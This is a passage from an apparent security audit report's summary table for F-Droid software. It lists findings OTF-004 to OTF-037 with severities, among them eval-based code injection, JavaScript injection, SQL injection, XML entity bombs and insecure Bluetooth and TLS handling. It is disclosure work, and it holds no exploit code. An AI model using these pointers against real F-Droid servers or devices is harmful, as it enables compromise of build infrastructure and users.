</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f25-infoleak-in-fdroidserver-checkupdates-py" style="color: #e2632a;">OTF-004</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Infoleak</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Attacker controlled URLs can be used first to run a regular expression on a local file, then depending on a match of the expression a second URL can be accessed or not. This can be used to leak information from the fdroid host.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data" style="color: #e2632a;">OTF-005</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The value of VercodeOperation supplied in the metadata of the app by the adversary is eval-ed in the fdroidserver script checkupdates.py.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f27-code-injection-via-malicious-appid-in-fdroidserver-build-py" style="color: #e2632a;">OTF-006</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>A maliciously crafted appid can be used to inject code in fdroidserver build.py:1274
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py" style="color: #e2632a;">OTF-007</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The linkify function of DescriptionFormatter in fdroidserver metadata.py allows for injection of javascript into the description of packages.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f33-bluetoothserver-java-request-uri-included-in-response" style="color: #e2632a;">OTF-008</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>html/JavaScript Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>BluetoothServer.java: Request URI Included in Response
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f39-trustonfirstuse-tofu-usage" style="color: #e2632a;">OTF-009</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Unverified trust</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Applicatioin uses TrustOnFirstUse (TOFU) potentially using unverified signing certificate.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites" style="color: #e2632a;">OTF-010</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious Use of Feature</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The request to http:https://[client IP]:8888/request-swap is vulnerable as it can be sent by any user, to the client's device. This can be used to show malicious messages and also redirect users.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><a name="summaryTableThreatLevelModerate"></a><div><a href="#f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py" style="color: #e2632a;">OTF-011</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Sanity checks in fdroidserver lint are easily evaded and allow injection of javascript code in descriptions of apps.</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver" style="color: #e2632a;">OTF-012</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>By submitting an app to fdroid with a crafted appid it is possible to deny the publishing of new apps to fdroid.</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py" style="color: #e2632a;">OTF-013</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Maliciously crafted images can lead to resource exhaustion in fdroidserver.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py" style="color: #e2632a;">OTF-014</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Insecure usage of temporary files can allow an attacker to cause a Denial of Service by linking to an important file and have it overwritten.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f20-parsing-untrusted-xml-data-in-fdroidserver" style="color: #e2632a;">OTF-015</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>XML file parsing can be used to exhaust resources (RAM) when entity parsing is abused for the Billion Laughs and Quadratic Blowup attacks. In fdroidserver there is a couple of places where such can happen.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f30-downloader-download-file-type-and-size-are-not-verified" style="color: #e2632a;">OTF-016</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Arbitrary file download</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div> Download File Type and Size Are Not Verified </div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection" style="color: #e2632a;">OTF-017</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure communication</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Insecure RFComm Socket Is Used for Bluetooth Connection - BluetoothClient.java
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection" style="color: #e2632a;">OTF-018</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure communication</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Insecure RFComm Socket Is Used for Bluetooth Connection - BluetoothServer.java
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f35-potential-sql-injection" style="color: #e2632a;">OTF-019</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>SQL Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Concatenation of strings, some of which are under attacker c.ontrol, is used to form DB queries.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f41-app-uses-data-from-clipboard" style="color: #e2632a;">OTF-020</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>URI redirect</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
App Uses Data From Clipboard for external resource link.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f43-file-deleted-unconditionally" style="color: #e2632a;">OTF-021</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>File deletion</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
The application deletes specified file unconditionally if it exists.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f44-secure-temp-file-usage-recommended" style="color: #e2632a;">OTF-022</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure temp file</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
nanohttpd.java uses insecure temp files
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues" style="color: #e2632a;">OTF-023</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Cryptography</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The application was found to be signed with a SHA1withRSA, which is known to have collision issues.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f47--fdroidclient-raw-sql-query-executions" style="color: #e2632a;">OTF-024</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>SQL Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>App uses and executes raw SQL query. An untrusted user input in raw SQL queries can lead to SQL Injection attacks.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-" style="color: #e2632a;">OTF-025</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious Use of Feature</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The application's feature Nearby Swap, allows a third person to snoop into the communication. And download files from either of the two user's device, without their permission.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f52--fdroid-client-insecure-implementation-of-ssl" style="color: #e2632a;">OTF-026</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Transport Layer Security</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Trusting all the certificates or accepting self-signed certificates is a critical Security Hole. This application is vulnerable to MITM attacks.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues" style="color: #e2632a;">OTF-027</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Cryptography</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>SHA1withRSA, which is known to have collision issues, has been used to sign the application package.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><a name="summaryTableThreatLevelLow"></a><div><a href="#f1-tabnabbing-in-repomaker" style="color: #e2632a;">OTF-028</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Tabnabbing</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious target site opened from repomaker can manipulate the page that opened it. </div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches" style="color: #e2632a;">OTF-029</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious File Upload</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insufficient checking of file types can lead to upload of malicious code.</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f10-unsafe-html-rendering-of-arbitrary-input" style="color: #e2632a;">OTF-030</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Unsafe use of the DatalistTextInput can lead to javascript injection in Repomaker. However this widget is currently only used to select predefined list of languages. However if in the future this widget is used to render unsanitized user input it can be easily exploited.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py" style="color: #e2632a;">OTF-031</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Dangerous Function</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
The dangerous python module pickle is being used to store and load a cache. On its own this is not exploitable, but when an attacker has can write files, then this can be escalated into a code execution vulnerability.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f19-starting-a-process-with-a-partial-executable-path" style="color: #e2632a;">OTF-032</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Execution without path</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
All external programs that are called by fdroidserver depend on the correct executable to be first found in the $PATH environment variable. If an attacker is able to place their own executable on a path before the legit executable that can lead to adversarial code execution.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py" style="color: #e2632a;">OTF-033</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Maliciously crafted appids can be used for code injection. However in this case the code injection is happening in the build VM, where other attacker controlled code is executed willingly.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f34-bluetootheserver-java-file-in-response-without-size-of-type-check" style="color: #e2632a;">OTF-034</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Arbitrary file in response</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
BluetootheServer.java: File included in Response Without Size or Type Check
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f36-no-mechanism-to-remove-root-ca-keys" style="color: #e2632a;">OTF-035</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Hardcoded keys</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
No Mechanism to Remove hardcoded Root CA Keys
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f37-use-of-rot13-and-base64-encoding" style="color: #e2632a;">OTF-036</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Weak data protection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Use of ROT13 and Base64 Encoding
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f38-untrusted-external-links" style="color: #e2632a;">OTF-037</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Unverified remote resources</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
External links used without validation
